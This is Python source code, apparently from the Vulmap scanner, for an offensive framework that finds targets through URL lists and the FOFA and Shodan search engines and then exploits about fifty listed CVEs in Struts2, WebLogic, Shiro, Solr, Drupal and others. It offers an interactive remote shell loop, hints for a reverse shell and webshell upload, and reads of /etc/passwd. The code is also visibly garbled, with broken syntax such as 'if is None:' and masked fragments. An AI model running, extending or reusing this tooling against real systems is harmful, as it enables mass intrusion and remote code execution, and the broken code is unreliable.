def control_options(args): # 选项控制,用于处理所有选项 delay = globals.get_value("DELAY") # 获取全局变量延时时间DELAY now_warn = now.timed(de=delay) + color.red_warn() if args.socks: proxy_set(args.socks, "socks") # proxy support socks5 http https elif args.http: proxy_set(args.http, "http") # proxy support socks5 http https if args.list is False: # 判断是否显示漏洞列表 print(now.timed(de=0) + color.yel_info() + color.yellow(" List of supported vulnerabilities")) print(vul_list()) if args.thread_num != 10: # 判断是否为默认线程 print(now.timed(de=0) + color.yel_info() + color.yellow(" Custom thread number: " + str(args.thread_num))) if args.vul is not None: # 判断是否-v进行漏洞利用 args.mode = "exp" # 若进行漏洞利用修改模式为exp if args.debug is False: # 判断是否开启--debug功能 print(now.timed(de=delay) + color.yel_info() + color.yellow(" Using debug mode to echo debug information")) globals.set_value("DEBUG", "debug") # 设置全局变量DEBUG ceye() # 测试ceye连接性 if args.O_TEXT: # 判断是否text输出 if os.path.isfile(args.O_TEXT): # 判断text输出文件是否冲突 print(now.timed(de=delay) + color.red_warn() +" The json file: [" + args.O_TEXT + "] already exists")) exit(0) if args.O_JSON: # 判断是否json输出 if os.path.isfile(args.O_JSON): # 判断json输出文件是否冲突 print(now.timed(de=delay) + color.red_warn() +" The json file: [" + args.O_JSON + "] already exists")) exit(0) if args.mode is None or args.mode == "poc": # 判断是否进入poc模式 if args.url is not None and args.file is None: # 判断是否为仅-u扫描单个URL args.url = url_check(args.url) # 处理url格式 if survival_check(args.url) == "f": # 检查目标存活状态 print(now.timed(de=0) + color.red_warn() +" Survival check failed: " + args.url)) exit(0) # 单个url时存活失败就退出 print(now.timed(de=0) + color.yel_info() + color.cyan(" Start scanning target: " + args.url)) if is None: # 判断是否扫描扫描全部webapps globals.set_value("RUNALLPOC", True) # 扫描单个URL并且所有webapps时RUNALLPOC=True core.control_webapps("url", args.url,, "poc") else: # 否则扫描单个webapps core.control_webapps("url", args.url,, "poc") elif args.file is not None and args.url is None: # 判断是否为仅-f批量扫描文件 if os.path.isfile(args.file): # 判断批量目标文件是否存在 print(now.timed(de=0) + color.yel_info() + color.cyan(" Start batch scanning target: " + args.file)) else: # 没有文件错误并退出 print(now.timed(de=0) + color.red_warn() +" Not found target file: " + args.file)) exit(0) if is None: # 判断是否扫描扫描全部webapps globals.set_value("RUNALLPOC", "FILE") # 批量扫描URL并且所有webapps时RUNALLPOC="FILE" core.control_webapps("file", args.file,, "poc") else: # 否则批量扫描单个webapps core.control_webapps("file", args.file,, "poc") elif args.url is None and args.file is None and args.fofa is not None: # 调用fofa api print(now.timed(de=0) + color.yel_info() + color.yellow(" Use fofa api to search [" + args.fofa + "] and start scanning")) if r"xxxxxx" in globals.get_value("fofa_key"): # 使用fofa api之前判断fofa信息是否正确 print(now.timed(de=0) + color.red_warn() +" Check fofa email is xxxxxx Please replace key and email")) print(now.timed(de=0) + color.red_warn() +" Go to find key and email")) print(now.timed(de=0) + color.red_warn() +" How to use key and email reference")) exit(0) else: print(now.timed(de=0) + color.yel_info() + color.yellow(" Fofa email: " + globals.get_value("fofa_email"))) print(now.timed(de=0) + color.yel_info() + color.yellow(" Fofa key: " + globals.get_value("fofa_key"))) fofa_list = fofa(args.fofa, args.size) # 调用fofa api拿到目标数组默认100个 if is None: # 判断是否扫描扫描全部webapps core.control_webapps("fofa", fofa_list,, "poc") else: core.control_webapps("fofa", fofa_list,, "poc") elif args.url is None and args.file is None and args.shodan is not None: # 调用fofa api 或者 shodan api print(now.timed(de=0) + color.yel_info() + color.yellow(" Use shodan api to search [" + args.shodan + "] and start scanning")) if r"xxxxxx" in globals.get_value("shodan_key"): # 使用shodan api之前判断shodan信息是否正确 print(now.timed(de=0) + color.red_warn() +" Check shodan key is xxxxxx Please replace key")) print(now.timed(de=0) + color.red_warn() +" Go to find key")) print(now.timed(de=0) + color.red_warn() +" How to use key reference")) exit(0) else: print(now.timed(de=0) + color.yel_info() + color.yellow(" Shodan key: " + globals.get_value("shodan_key"))) shodan_list = shodan_api(args.shodan) # 调用shodan api拿到目标数组默认100个 if is None: # 判断是否扫描扫描全部webapps core.control_webapps("shodan", shodan_list,, "poc") else: core.control_webapps("shodan", shodan_list,, "poc") if args.O_TEXT: print(now.timed(de=delay) + color.yel_info() + color.cyan(" Scan result text saved to: " + args.O_TEXT)) if args.O_JSON: print(now.timed(de=delay) + color.yel_info() + color.cyan(" Scan result json saved to: " + args.O_JSON)) elif args.mode == "exp": # 漏洞利用模式参数较少 if args.vul is not None and args.url is not None: # 判断是否进入漏洞利用模式 core.control_webapps("url", args.url, args.vul, "exp") else: print(now_warn +" Options error, -v must specify -u")) else: print(now_warn +" Options error ... ..."))
def control_webapps(target_type, target, webapps, mode): t_num = globals.get_value("THREADNUM") # 线程数量 thread_poc = [] # 多线程字典,用于添加线程任务 gevent_pool = [] # 协程字段,用于添加协程任务 thread_pool = ThreadPoolExecutor(t_num) # 多线程池数量t_num由选项控制,默认10线程 webapps_identify = [] # 定义目标类型字典,用于目标类型识别并记录,为跑所有poc时进行类型识别 if mode == "poc": # poc漏洞扫描模式 if target_type == "url": # ========================================================= 第一种扫描仅扫描单个URL output("text", "[*] " + target) # 丢给output模块判断是否输出文件 if webapps is None: # 判断是否进行指纹识别 Identify.start(target, webapps_identify) # 第一种情况需要进行指纹识别 elif r"all" in webapps: # 判断是否扫描所有类型poc print(now.timed(de=0) + color.yel_info() + color.yellow(" Specify to scan all vulnerabilities")) webapps_identify.append("all") # 指定扫描所有时,需要将指纹全部指定为all else: webapps_identify = webapps # 指定但不是all,也可以指定多个类型,比如-a solr struts2 print(now.timed(de=0) + color.yel_info() + color.yellow(" Specify scan vulnerabilities for: "), end='') count = 0 # 用于判断类型的数量,一个还是多个 for w_i in webapps_identify: print(color.cyan(w_i), end=' ') count += 1 if count % len(webapps_identify) == 0: print(end='\n') core.scan_webapps(webapps_identify, thread_poc, thread_pool, gevent_pool, target) # 调用scan开始扫描 joinall(gevent_pool) # 运行协程池 wait(thread_poc, return_when=ALL_COMPLETED) # 等待所有多线程任务运行完 print(now.timed(de=0) + color.yel_info() + color.yellow(" Scan completed and ended ")) elif target_type == "file": # ========================= 第二种扫描情况,批量扫描文件不指定webapps时需要做指纹识别 count_line = -1 # 用于判断行数 count_null = 0 for line in open(target).readlines(): # 判断文件里有多少空行 line = line.strip() # 读取目标时过滤杂质 if line == "": count_null += 1 for count_line, line in enumerate(open(target, 'rU')): # 判断文件的行数 pass count_line += 1 # 行数加1 target_num = count_line - count_null now_num = 0 # 当前数量 target_list = [] # 批量扫描需要读取的字典 with open(target, 'r') as _: # 打开目标文件 for line in _: # 用for循环读取文件 line = line.strip() # 过滤杂质 if line: # 判断是否结束 target_list.append(line) # 读取到的目标加入字典准备扫描 now_num += 1 # 读取到之后当前数量+1 furl = line furl = url_check(furl) # url格式检测 output("text", "[*] " + furl) # 丢给output模块判断是否输出文件 if survival_check(furl) == "f": # 如果存活检测失败就跳过 print(now.timed(de=0) + color.red_warn() + " Current:[" + str(now_num) + "] Total:[" + str( target_num) + "] Survival check failed: " + furl)) continue else: # 存活不失败就正常显示 print(now.timed(de=0) + color.yel_info() + color.yellow( " Current:[" + str(now_num) + "] Total:[" + str( target_num) + "] Scanning target: " + furl)) if webapps is None: # 判断是否要进行指纹识别 webapps_identify.clear() # 可能跟单个url冲突需要清理字典 Identify.start(furl, webapps_identify) # 识别指纹 # print(webapps_identify) elif r"all" in webapps: # 不识别指纹运行所有 print(now.timed(de=0) + color.yel_info() + color.yellow( " Specify to scan all vulnerabilities")) webapps_identify.append("all") else: webapps_identify = webapps print(now.timed(de=0) + color.yel_info() + color.yellow( " Specify scan vulnerabilities for: "), end='') count = 0 for w_i in webapps_identify: print(color.cyan(w_i), end=' ') count += 1 if count % len(webapps_identify) == 0: print(end='\n') core.scan_webapps(webapps_identify, thread_poc, thread_pool, gevent_pool, furl) # 开扫 joinall(gevent_pool) # 运行协程池 wait(thread_poc, return_when=ALL_COMPLETED) # 等待所有多线程任务运行完 print(now.timed(de=0) + color.yel_info() + color.yellow(" Scan completed and ended ")) elif target_type == "fofa" or target_type == "shodan": # ======================================================= 第三种调用fofa api total = len(target) # fofa api的总数,不出意外100个 if webapps is not None: if r"all" in webapps: # 不识别直接扫描所有类型 print(now.timed(de=0) + color.yel_info() + color.yellow(" Specify to scan all vulnerabilities")) webapps_identify.append("all") else: webapps_identify = webapps # 扫描指定的类型 print(now.timed(de=0) + color.yel_info() + color.yellow(" Specify scan vulnerabilities for: "), end='') count = 0 for w_i in webapps_identify: print(color.cyan(w_i), end=' ') count += 1 if count % len(webapps_identify) == 0: print(end='\n') now_num = 0 # 当前第几个 for f_target in target: fofa_target = url_check(f_target) output("text", "[*] " + fofa_target) # 丢给output模块判断是否输出文件 now_num += 1 if survival_check(fofa_target) == "f": print(now.timed(de=0) + color.red_warn() + " Current:[" + str(now_num) + "] Total:[" + str( total) + "] Survival check failed: " + fofa_target)) continue else: print(now.timed(de=0) + color.yel_info() + color.yellow( " Current:[" + str(now_num) + "] Total:[" + str( total) + "] Scanning target: " + fofa_target)) if webapps is None: # 需要指纹识别 Identify.start(target, webapps_identify) # 是否需要进行指纹识别 core.scan_webapps(webapps_identify, thread_poc, thread_pool, gevent_pool, fofa_target) joinall(gevent_pool) # 运行协程池 wait(thread_poc, return_when=ALL_COMPLETED) # 等待所有多线程任务运行完 print(now.timed(de=0) + color.yel_info() + color.yellow(" Scan completed and ended ")) elif mode == "exp": # 漏洞利用 vul_num = webapps exploit(target, vul_num) # 调用core中的exploit
def exploit(target, vul_num): target = url_check(target) if survival_check(target) == "f": print( now.timed(de=0) + color.red_warn() +" Survival check failed: " + target)) exit(0) delay = globals.get_value("DELAY") # 获取全局变量DELAY exp_apache_shiro = ApacheShiro(target) exp_apache_solr = ApacheSolr(target) exp_apache_tomcat = ApacheTomcat(target) exp_elasticsearch = Elasticsearch(target) exp_apache_flink = ApacheFlink(target) exp_jenkins = Jenkins(target) exp_spring = Spring(target) exp_nexus = Nexus(target) exp_oracle_weblogic = OracleWeblogic(target) exp_redhat_jboss = RedHatJBoss(target) exp_apache_unomi = ApacheUnomi(target) exp_thinkphp = ThinkPHP(target) exp_drupal = Drupal(target) exp_fastjson = Fastjson(target) exp_apache_struts2 = ApacheStruts2(target) print( now.timed(de=delay) + color.yel_info() + color.cyan(" Target url: " + target)) print( now.timed(de=delay) + color.yel_info() + color.cyan(" Use exploit modules: " + vul_num)) nc = now.timed(de=0) + color.yel_info() + color.yellow( " input \"nc\" bounce linux shell") up = now.timed(de=0) + color.yel_info() + color.yellow( " input \"upload\" upload webshell") rmi_ldap = now.timed(de=0) + color.yel_info() + color.yellow( " RMI/LDAP Server:(e.g. ldap://") bash = now.timed(de=0) + color.yel_info() + color.yellow( " nc shell: \"bash -i >&/dev/tcp/ 0>&1\"") cmd = "whoami" # 为了消除pycharm错误提示,没啥用 file = "/etc/passwd" # 为了消除pycharm错误提示,没啥用 shiro_key = "1" # 为了消除pycharm错误提示,没啥用 shiro_gadget = "1" # 为了消除pycharm错误提示,没啥用 nexus_u = "admin" # 为了消除pycharm错误提示,没啥用 nexus_p = "admin" # 为了消除pycharm错误提示 if vul_num not in explists: print( now.timed(de=0) + color.red_warn() + " The vulnerability does not support exploitation. Please refer to \"--list\"" )) sys.exit(0) elif vul_num == "CVE-2016-4437" or vul_num == "cve-2016-4437": if os_check() == "linux" or os_check() == "other": shiro_key = input(now.timed(de=delay) +"[+] key: ")) shiro_gadget = input( now.timed(de=delay) +"[+] gadget: ")) elif os_check() == "windows": shiro_key = input(now.no_color_timed(de=delay) + "[+] key: ") shiro_gadget = input(now.no_color_timed(de=delay) + "[+] gadget: ") while True: if os_check() == "linux" or os_check() == "other": cmd = input( now.timed(de=delay) +"[+] Shell >>> ")) elif os_check() == "windows": cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") if cmd == "exit" or cmd == "quit" or cmd == "bye": sys.exit(0) exp_apache_shiro.cve_2016_4437_exp(cmd, shiro_key, shiro_gadget) elif vul_num == "CVE-2020-1938" or vul_num == "cve-2020-1938": print( now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: WEB-INF/web.xml")) while True: if os_check() == "linux" or os_check() == "other": file = input( now.timed(de=delay) +"[+] File >>> ")) elif os_check() == "windows": file = input(now.no_color_timed(de=delay) + "[+] File >>> ") if file == "exit" or file == "quit" or file == "bye": exit(0) exp_apache_tomcat.cve_2020_1938_exp(file) elif vul_num == "CVE-2019-3799" or vul_num == "cve-2019-3799": print( now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd")) while True: if os_check() == "linux" or os_check() == "other": file = input( now.timed(de=delay) +"[+] File >>> ")) elif os_check() == "windows": file = input(now.no_color_timed(de=delay) + "[+] File >>> ") if file == "exit" or file == "quit" or file == "bye": exit(0) exp_spring.cve_2019_3799_exp(file) elif vul_num == "CVE-2020-5410" or vul_num == "cve-2020-5410": print( now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd")) while True: if os_check() == "linux" or os_check() == "other": file = input( now.timed(de=delay) +"[+] File >>> ")) elif os_check() == "windows": file = input(now.no_color_timed(de=delay) + "[+] File >>> ") if file == "exit" or file == "quit" or file == "bye": exit(0) exp_spring.cve_2020_5410_exp(file) elif vul_num == "CVE-2020-17519" or vul_num == "cve-2020-17519": print( now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd")) while True: if os_check() == "linux" or os_check() == "other": file = input( now.timed(de=delay) +"[+] File >>> ")) elif os_check() == "windows": file = input(now.no_color_timed(de=delay) + "[+] File >>> ") if file == "exit" or file == "quit" or file == "bye": exit(0) exp_apache_flink.cve_2020_17519_exp(file) elif vul_num == "CVE-2020-10199" or vul_num == "cve-2020-10199": if os_check() == "linux" or os_check() == "other": nexus_u = input( now.timed(de=delay) +"[+] Input username: "******"[+] Input password: "******"windows": nexus_u = input( now.no_color_timed(de=delay) + "[+] Input username: "******"[+] Input password: "******"linux" or os_check() == "other": cmd = input( now.timed(de=delay) +"[+] Shell >>> ")) elif os_check() == "windows": cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") if cmd == "exit" or cmd == "quit" or cmd == "bye": sys.exit(0) exp_nexus.cve_2020_10199_exp(cmd, nexus_u, nexus_p) # 远程命令执行漏洞单独简单运行 else: while True: if os_check() == "linux" or os_check() == "other": cmd = input( now.timed(de=delay) +"[+] Shell >>> ")) elif os_check() == "windows": cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") if cmd == "exit" or cmd == "quit" or cmd == "bye": exit(0) elif vul_num == "CVE-2017-12615" or vul_num == "cve-2017-12615": exp_apache_tomcat.cve_2017_12615_exp(cmd) elif vul_num == "CVE-2014-3120" or vul_num == "cve-2014-3120": exp_elasticsearch.cve_2014_3120_exp(cmd) elif vul_num == "CVE-2015-1427" or vul_num == "cve-2015-1427": exp_elasticsearch.cve_2015_1427_exp(cmd) elif vul_num == "CVE-2018-1000861" or vul_num == "cve-2018-1000861": exp_jenkins.cve_2018_1000861_exp(cmd) elif vul_num == "CVE-2017-3506" or vul_num == "cve-2017-3506": exp_oracle_weblogic.cve_2017_3506_exp(cmd) elif vul_num == "CVE-2017-10271" or vul_num == "cve-2017-10271": print(nc) print(up) exp_oracle_weblogic.cve_2017_10271_exp(cmd) elif vul_num == "CVE-2018-2894" or vul_num == "cve-2018-2894": exp_oracle_weblogic.cve_2018_2894_exp(cmd) elif vul_num == "CVE-2019-2725" or vul_num == "cve-2019-2725": print(nc) print(up) exp_oracle_weblogic.cve_2019_2725_exp(cmd) elif vul_num == "CVE-2019-2729" or vul_num == "CVE-2019-2729": print(nc) exp_oracle_weblogic.cve_2019_2729_exp(cmd) elif vul_num == "CVE-2020-2555" or vul_num == "cve-2020-2555": exp_oracle_weblogic.cve_2020_2555_exp(cmd) elif vul_num == "CVE-2020-2883" or vul_num == "cve-2020-2883": exp_oracle_weblogic.cve_2020_2883_exp(cmd) elif vul_num == "CVE-2020-14882" or vul_num == "cve-2020-14882": exp_oracle_weblogic.cve_2020_14882_exp(cmd) elif vul_num == "CVE-2017-12629" or vul_num == "cve-2017-12629": exp_apache_solr.cve_2017_12629_exp(cmd) elif vul_num == "CVE-2019-17558" or vul_num == "cve-2019-17558": exp_apache_solr.cve_2019_17558_exp(cmd) elif vul_num == "CVE-2019-7238" or vul_num == "cve-2019-7238": exp_nexus.cve_2019_7238_exp(cmd) elif vul_num == "CVE-2010-0738" or vul_num == "cve-2010-0738": exp_redhat_jboss.cve_2010_0738_exp(cmd) elif vul_num == "CVE-2010-1428" or vul_num == "cve-2010-1428": exp_redhat_jboss.cve_2010_1428_exp(cmd) elif vul_num == "CVE-2015-7501" or vul_num == "cve-2015-7501": exp_redhat_jboss.cve_2015_7501_exp(cmd) elif vul_num == "CVE-2020-13942" or vul_num == "cve-2020-13942": exp_apache_unomi.cve_2020_13942_exp(cmd) elif vul_num == "CVE-2019-9082" or vul_num == "cve-2019-9082": print(up) exp_thinkphp.cve_2019_9082_exp(cmd) elif vul_num == "CVE-2018-20062" or vul_num == "cve-2018-20062": exp_thinkphp.cve_2018_20062_exp(cmd) elif vul_num == "CVE-2018-7600" or vul_num == "cve-2018-7600": exp_drupal.cve_2018_7600_exp(cmd) elif vul_num == "CVE-2018-7602" or vul_num == "cve-2018-7602": exp_drupal.cve_2018_7602_exp(cmd) elif vul_num == "CVE-2019-6340" or vul_num == "cve-2019-6340": exp_drupal.cve_2019_6340_exp(cmd) elif vul_num == "S2-005" or vul_num == "s2-005": exp_apache_struts2.s2_005_exp(cmd) elif vul_num == "S2-008" or vul_num == "s2-008": exp_apache_struts2.s2_008_exp(cmd) elif vul_num == "S2-009" or vul_num == "s2-009": exp_apache_struts2.s2_009_exp(cmd) elif vul_num == "S2-013" or vul_num == "s2-013": exp_apache_struts2.s2_013_exp(cmd) elif vul_num == "S2-015" or vul_num == "s2-015": exp_apache_struts2.s2_015_exp(cmd) elif vul_num == "S2-016" or vul_num == "s2-016": exp_apache_struts2.s2_016_exp(cmd) elif vul_num == "S2-029" or vul_num == "s2-029": exp_apache_struts2.s2_029_exp(cmd) elif vul_num == "S2-032" or vul_num == "s2-032": exp_apache_struts2.s2_032_exp(cmd) elif vul_num == "S2-045" or vul_num == "s2-045": exp_apache_struts2.s2_045_exp(cmd) elif vul_num == "S2-046" or vul_num == "s2-046": exp_apache_struts2.s2_046_exp(cmd) elif vul_num == "S2-048" or vul_num == "s2-048": exp_apache_struts2.s2_048_exp(cmd) elif vul_num == "S2-052" or vul_num == "s2-052": exp_apache_struts2.s2_052_exp(cmd) elif vul_num == "S2-057" or vul_num == "s2-057": exp_apache_struts2.s2_057_exp(cmd) elif vul_num == "S2-059" or vul_num == "s2-059": exp_apache_struts2.s2_059_exp(cmd) elif vul_num == "S2-061" or vul_num == "s2-061": exp_apache_struts2.s2_061_exp(cmd) elif vul_num == "S2-devMode" or vul_num == "s2-devmode": exp_apache_struts2.s2_devMode_exp(cmd) elif vul_num == "1.2.24": print(rmi_ldap) exp_fastjson.fastjson_1224_exp(cmd) elif vul_num == "1.2.47": print(rmi_ldap) exp_fastjson.fastjson_1247_exp(cmd) elif vul_num == "1.2.62": print(rmi_ldap) exp_fastjson.fastjson_1262_exp(cmd) else: pass
def vul_list(): vuln_list = color.cyan_fine(""" +-------------------+------------------+-----+-----+-------------------------------------------------------------+ | Target type | Vuln Name | Poc | Exp | Impact Version && Vulnerability description | +-------------------+------------------+-----+-----+-------------------------------------------------------------+ | Apache ActiveMQ | CVE-2015-5254 | Y | N | < 5.13.0, deserialization remote code execution | | Apache ActiveMQ | CVE-2016-3088 | Y | Y | < 5.14.0, http put&move upload webshell | | Apache Druid | CVE-2021-25646 | Y | Y | < 0.20.1, apache druid console remote code execution | | Apache Flink | CVE-2020-17518 | Y | N | < 1.11.3 or < 1.12.0, upload path traversal | | Apache Flink | CVE-2020-17519 | Y | Y | 1.5.1 - 1.11.2, 'jobmanager/logs' path traversal | | Apache OFBiz | CVE-2021-26295 | Y | N | < 17.12.06, rmi deserializes arbitrary code execution | | Apache OFBiz | CVE-2021-29200 | Y | N | < 17.12.07, rmi deserializes arbitrary code execution | | Apache OFBiz | CVE-2021-30128 | Y | Y | < 17.12.07, deserialize remote command execution | | Apache Shiro | CVE-2016-4437 | Y | Y | <= 1.2.4, shiro-550, rememberme deserialization rce | | Apache Solr | CVE-2017-12629 | Y | Y | < 7.1.0, runexecutablelistener rce & xxe, only rce is here | | Apache Solr | CVE-2019-0193 | Y | N | < 8.2.0, dataimporthandler module remote code execution | | Apache Solr | CVE-2019-17558 | Y | Y | 5.0.0 - 8.3.1, velocity response writer rce | | Apache Solr | time-2021-0318 | Y | Y | all, apache solr arbitrary file reading | | Apache Solr | CVE-2021-27905 | Y | N | 7.0.0-7.7.3, 8.0.0-8.8.1, replication handler ssrf | | Apache Struts2 | S2-005 | Y | Y | 2.0.0 -, cve-2010-1870 parameters interceptor rce | | Apache Struts2 | S2-008 | Y | Y | 2.0.0 - 2.3.17, debugging interceptor rce | | Apache Struts2 | S2-009 | Y | Y | 2.1.0 -, cve-2011-3923 ognl interpreter rce | | Apache Struts2 | S2-013 | Y | Y | 2.0.0 -, cve-2013-1966 ognl interpreter rce | | Apache Struts2 | S2-015 | Y | Y | 2.0.0 -, cve-2013-2134 ognl interpreter rce | | Apache Struts2 | S2-016 | Y | Y | 2.0.0 - 2.3.15, cve-2013-2251 ognl interpreter rce | | Apache Struts2 | S2-029 | Y | Y | 2.0.0 -, ognl interpreter rce | | Apache Struts2 | S2-032 | Y | Y | 2.3.20-28, cve-2016-3081 rce can be performed via method | | Apache Struts2 | S2-045 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce | | Apache Struts2 | S2-046 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce | | Apache Struts2 | S2-048 | Y | Y | 2.3.x, cve-2017-9791 struts2-struts1-plugin rce | | Apache Struts2 | S2-052 | Y | Y | 2.1.2 - 2.3.33, 2.5 - 2.5.12 cve-2017-9805 rest plugin rce | | Apache Struts2 | S2-057 | Y | Y | 2.0.4 - 2.3.34, 2.5.0-2.5.16, cve-2018-11776 namespace rce | | Apache Struts2 | S2-059 | Y | Y | 2.0.0 - 2.5.20, cve-2019-0230 ognl interpreter rce | | Apache Struts2 | S2-061 | Y | Y | 2.0.0-2.5.25, cve-2020-17530 ognl interpreter rce | | Apache Struts2 | S2-devMode | Y | Y | 2.1.0 - 2.5.1, devmode remote code execution | | Apache Tomcat | Examples File | Y | N | all version, /examples/servlets/servlet | | Apache Tomcat | CVE-2017-12615 | Y | Y | 7.0.0 - 7.0.81, put method any files upload | | Apache Tomcat | CVE-2020-1938 | Y | Y | 6, 7 < 7.0.100, 8 < 8.5.51, 9 < 9.0.31 arbitrary file read | | Apache Unomi | CVE-2020-13942 | Y | Y | < 1.5.2, apache unomi remote code execution | | CoreMail | time-2021-0414 | Y | N | Coremail configuration information disclosure vulnerability | | Drupal | CVE-2018-7600 | Y | Y | 6.x, 7.x, 8.x, drupalgeddon2 remote code execution | | Drupal | CVE-2018-7602 | Y | Y | < 7.59, < 8.5.3 (except 8.4.8) drupalgeddon2 rce | | Drupal | CVE-2019-6340 | Y | Y | < 8.6.10, drupal core restful remote code execution | | Ecology | time-2021-0515 | Y | Y | <= 9.0, e-cology oa workflowservicexml rce | | Elasticsearch | CVE-2014-3120 | Y | Y | < 1.2, elasticsearch remote code execution | | Elasticsearch | CVE-2015-1427 | Y | Y | < 1.3.7, < 1.4.3, elasticsearch remote code execution | | Exchange | CVE-2021-26855 | Y | N | 2010 2013 2016 2019, microsoft exchange server ssrf | | Exchange | CVE-2021-27065 | Y | Y | 2010 2013 2016 2019, exchange arbitrary file write | | Eyou Email | CNVD-2021-26422 | Y | Y | eyou email system has remote command execution | | F5 BIG-IP | CVE-2020-5902 | Y | Y | < 11.6.x, f5 big-ip remote code execution | | F5 BIG-IP | CVE-2021-22986 | Y | Y | < 16.0.1, f5 big-ip remote code execution | | Fastjson | VER-1224-1 | Y | Y | <= 1.2.24 fastjson parse object remote code execution | | Fastjson | VER-1224-2 | Y | Y | <= 1.2.24 fastjson parse object remote code execution | | Fastjson | VER-1224-3 | Y | Y | <= 1.2.24 fastjson parse object remote code execution | | Fastjson | VER-1247 | Y | Y | <= 1.2.47 fastjson autotype remote code execution | | Fsatjson | VER-1262 | Y | Y | <= 1.2.62 fastjson autotype remote code execution | | Jenkins | CVE-2017-1000353 | Y | N | <= 2.56, LTS <= 2.46.1, jenkins-ci remote code execution | | Jenkins | CVE-2018-1000861 | Y | Y | <= 2.153, LTS <= 2.138.3, remote code execution | | Laravel | CVE-2018-15133 | N | Y | 5.5.x <= 5.5.40, 5.6.x <= 5.6.29, laravel get app_key rce | | Laravel | CVE-2021-3129 | Y | N | ignition <= 2.5.1, laravel debug mode remote code execution | | Nexus OSS/Pro | CVE-2019-7238 | Y | Y | 3.6.2 - 3.14.0, remote code execution vulnerability | | Nexus OSS/Pro | CVE-2020-10199 | Y | Y | 3.x <= 3.21.1, remote code execution vulnerability | | Node.JS | CVE-2021-21315 | Y | N | systeminformation < 5.3.1, node.js command injection | | Oracle Weblogic | CVE-2014-4210 | Y | N | 10.0.2 - 10.3.6, weblogic ssrf vulnerability | | Oracle Weblogic | CVE-2016-0638 | Y | N |, 12.2.1-3, t3 deserialization rce | | Oracle Weblogic | CVE-2017-3506 | Y | Y |,,, weblogic wls-wsat rce | | Oracle Weblogic | CVE-2017-10271 | Y | Y |,,, weblogic wls-wsat rce | | Oracle Weblogic | CVE-2018-2894 | Y | Y |,, deserialization any file upload | | Oracle Weblogic | CVE-2018-3191 | Y | N |,,, t3 deserialization rce | | Oracle Weblogic | CVE-2019-2725 | Y | Y |,, weblogic wls9-async deserialization rce | | Oracle Weblogic | CVE-2019-2890 | Y | N |,,, t3 deserialization rce | | Oracle Weblogic | CVE-2019-2729 | Y | Y |,, wls9-async deserialization rce | | Oracle Weblogic | CVE-2020-2551 | Y | N |,,, wlscore deserialization rce | | Oracle Weblogic | CVE-2020-2555 | Y | Y |,,, t3 deserialization rce | | Oracle Weblogic | CVE-2020-2883 | Y | Y |,,, iiop t3 deserialization rce | | Oracle Weblogic | CVE-2020-14882 | Y | Y |,,,, console rce | | Oracle Weblogic | CVE-2020-2109 | Y | Y |,,,, unauthorized jndi | | QiAnXin | time-2021-0410 | Y | Y | qianxin ns-ngfw netkang next generation firewall front rce | | RedHat JBoss | CVE-2010-0738 | Y | Y | 4.2.0 - 4.3.0, jmx-console deserialization any files upload | | RedHat JBoss | CVE-2010-1428 | Y | Y | 4.2.0 - 4.3.0, web-console deserialization any files upload | | RedHat JBoss | CVE-2015-7501 | Y | Y | 5.x, 6.x, jmxinvokerservlet deserialization any file upload | | RuiJie | time_2021_0424 | Y | N | get account password, background rce | | Saltstack | CVE-2021-25282 | Y | Y | < 3002.5, saltStack arbitrary file writing vulnerability | | Spring Data | CVE-2018-1273 | Y | Y | 1.13 - 1.13.10, 2.0 - 2.0.5, spring data commons rce | | Spring Cloud | CVE-2019-3799 | Y | Y | 2.1.0-2.1.1, 2.0.0-2.0.3, 1.4.0-1.4.5, directory traversal | | Spring Cloud | CVE-2020-5410 | Y | Y | < 2.2.3, < 2.1.9, directory traversal vulnerability | | ThinkPHP | CVE-2019-9082 | Y | Y | < 3.2.4, thinkphp rememberme deserialization rce | | ThinkPHP | CVE-2018-20062 | Y | Y | <= 5.0.23, 5.1.31, thinkphp rememberme deserialization rce | | Vmware vCenter | time-2020-1013 | Y | N | <= 6.5u1, vmware vcenter arbitrary file reading (not cve) | | Vmware vCenter | CVE-2021-21972 | Y | Y | 7.0 < 7.0U1c, 6.7 < 6.7U3l, 6.5 < 6.5U3n, any file upload | | VMware vRealize | CVE-2021-21975 | Y | N | <= 8.3.0, vmware vrealize operations manager api ssrf | +-------------------+------------------+-----+-----+-------------------------------------------------------------+ """ + color.yellow("\n Vulmap release does not provide the exploit function after September 1, 2021 \n")) return vuln_list
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # author: zhzyker # github: from module.color import color import random banner_1 = color.yellow(""" __ [ | _ __ __ _ | | _ .--..--. ,--. _ .--. [ \ [ ][ | | | | | [ `.-. .-. | `'_\ :[ '/'`\ \ \ \/ / | \_/ |, | | | | | | | | // | |,| \__/ | \__/ '.__.'_/[___][___||__||__]\'-;__/| ;.___/ [__|""") banner_2 = color.yellow(r''' +---------------+ How to find vulnerabilities? | vulmap | +---------------+ (╯▔^▔)╯ \ (•◡ •) / \ | | /  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄''') def banner(): o_o = random.choice(range(10)) if o_o == 0: return banner_1 elif o_o == 1: return banner_1 elif o_o == 2:
